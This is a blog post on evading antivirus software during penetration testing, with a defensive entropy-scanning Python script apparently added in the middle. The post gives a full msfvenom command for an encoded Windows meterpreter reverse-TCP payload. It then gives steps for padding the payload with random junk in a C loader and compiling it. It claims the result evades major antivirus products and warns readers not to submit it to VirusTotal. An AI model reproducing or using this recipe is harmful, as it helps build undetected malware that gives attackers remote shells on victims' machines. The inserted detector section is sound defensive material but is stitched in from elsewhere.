Evading Almost Every Anti-Virus

Niteesh Kumar
Jul 22, 2017 · 3 min read

Evading an anti-virus can be a real pain in the a$$, and while penetration testing you get only one chance to exploit and you don’t want to get caught. There are various evasion methods out there. Some of the best are the Veil-Evasion Framework and Hyper Encryption; the msf encoder shikata_ga_nai on its own is not useful enough. With the method below you’ll get a 96.5% evasion rate.

So I decided to go raw instead of relying on automated tools (don’t be a #scr1ptkidi3). Going raw is not easy, but it gives you more freedom to customize.

Here I’ll show you how to generate an undetectable payload using msfvenom and the C language.

Let’s start by generating the raw payload with msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.110 lport=5005 -e x86/shikata_ga_nai -i 5 -b "\x00\xff" -v bleed -f c -o shellcode.txt

Now our payload is generated. Let’s write the code that carries it. Make a note of the payload size, 468 bytes in this case; it will be needed later in the main C file.

Note: the payload file, i.e. the C file, must be compiled on a Windows machine.

Below is the sample payload in C. All we need to do now is add the junk characters, the shellcode and the payload size.

Let’s generate the junk characters; here we’ll use openssl to generate a random hex value of length 500.

openssl rand -hex 500

Now copy these junk chars into the import variable in the C file, and copy the shellcode into the bleed variable. Then enter the size of the payload.

Final Look of Payload (C File)

Now we’re ready to compile. I recommend the mingw compiler. Once compiled, you’re ready to go: fire up Metasploit and start the handler for the same payload, lhost and lport.
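From the defender’s side, the reason a loader of this shape is still catchable is worth seeing: the junk from openssl is ASCII hex and looks like ordinary text once compiled in, but the shikata_ga_nai-encoded shellcode in the bleed array is a run of bytes close to random, and a sliding-window entropy scan of the binary picks that region out. The script below is an added example, not code from the post; it scans a constructed SAMPLE_BUFFER (plain program text around one 256-byte block in which every byte value appears once, standing in for an encoded blob). The 256-byte window, 64-byte step and 7.0-bit threshold are assumptions to tune, not fixed rules.

```python
"""Sliding-window Shannon entropy scan (added example, not from the post).

Assumptions: window=256, step=64 and threshold=7.0 bits/byte are starting
points to tune. SAMPLE_BUFFER is constructed here for a stand-alone run.
"""
import math
import random
import sys
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for an empty or constant buffer, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(data: bytes, window: int = 256, step: int = 64,
                         threshold: float = 7.0) -> list[tuple[int, float]]:
    """Return (offset, entropy) for every window at or above the threshold.

    Machine code, ASCII strings and hex text stay well below 7 bits per byte;
    an encoded or encrypted blob of raw bytes sits close to 8.
    """
    hits = []
    last_start = max(len(data) - window, 0)
    for offset in range(0, last_start + 1, step):
        entropy = shannon_entropy(data[offset:offset + window])
        if entropy >= threshold:
            hits.append((offset, round(entropy, 2)))
    return hits


# Constructed sample: ordinary program text surrounding one 256-byte block in
# which every byte value occurs exactly once (stand-in for an encoded blob).
_TEXT = b"normal program strings, config text, and help output. " * 20
_rng = random.Random(1234)          # fixed seed so the sample is reproducible
_BLOB = list(range(256))
_rng.shuffle(_BLOB)
SAMPLE_BUFFER = _TEXT[:512] + bytes(_BLOB) + _TEXT[:256]


def scan_file(path: str) -> list[tuple[int, float]]:
    """Scan a file on disk, e.g. a compiled loader, with the default parameters."""
    with open(path, "rb") as fh:
        return high_entropy_regions(fh.read())


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    hits = scan_file(target) if target else high_entropy_regions(SAMPLE_BUFFER)
    for offset, entropy in hits:
        print(f"offset 0x{offset:06x}: {entropy:.2f} bits/byte")
```

Run it with no arguments to scan the built-in sample, or pass a file path to scan a binary; only the window sitting exactly on the blob reaches 8.0 bits, the text windows stay around 4, and the windows straddling both fall in between. This is a heuristic rather than a verdict: legitimate compressed or encrypted resources also score high, so the hit list is a place to start looking, not proof on its own.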


Note: Please do not upload it to VirusTotal. You can download and install a trial version of a top-ranked anti-virus and check. It can evade Kaspersky and Bitdefender as well (top-ranked anti-virus lol :D). Don’t be evil, this is for education purposes only.

Special thanks to Georgia Weidman. I personally recommend reading her book “Penetration Testing: A Hands-on Introduction to Hacking”. It’s really awesome.
